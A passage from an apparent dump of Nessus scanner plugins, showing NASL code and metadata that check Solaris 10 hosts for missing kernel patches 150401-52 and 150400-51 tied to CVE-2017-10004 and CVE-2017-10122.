version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcpc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWesu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWlxr\", version:\"11.10.0,REV=2007.06.20.13.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.13.23.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWos86r\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.04.20.04.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWrcmdc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"150401-52\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.01.46\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWarc / SUNWarcr / SUNWbtool / SUNWcakr / SUNWckr / SUNWcpc / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:02", "bulletinFamily": "scanner", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "modified": "2019-11-02T00:00:00", "id": "SOLARIS10_150400-51.NASL", "href": "https://www.tenable.com/plugins/nessus/107719", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 150400-51", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107719);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/22 9:47:14\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-51\");\n script_summary(english:\"Check for patch 150400-51\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-51\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-51\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-51\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:122255\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127980\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:137048\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139510\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:139944\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142007\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:142332\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:144540\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146808\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146838\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:146848\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:147697\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148174\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148231\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148338\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148553\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148557\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148721\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148730\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148766\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:148875\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149502\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149616\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149640\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149642\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149648\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149718\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:149729\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150108\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150109\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150115\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150125\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150161\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150169\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150300\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150307\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150311\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150400\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150527\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150531\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150532\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150541\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150627\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150629\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150756\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150760\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150840\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150841\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151145\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151149\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151425\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:151608\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152367\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152530\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:152539\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-51\", obsoleted_by:\"\", package:\"SUNWs8brandu\", 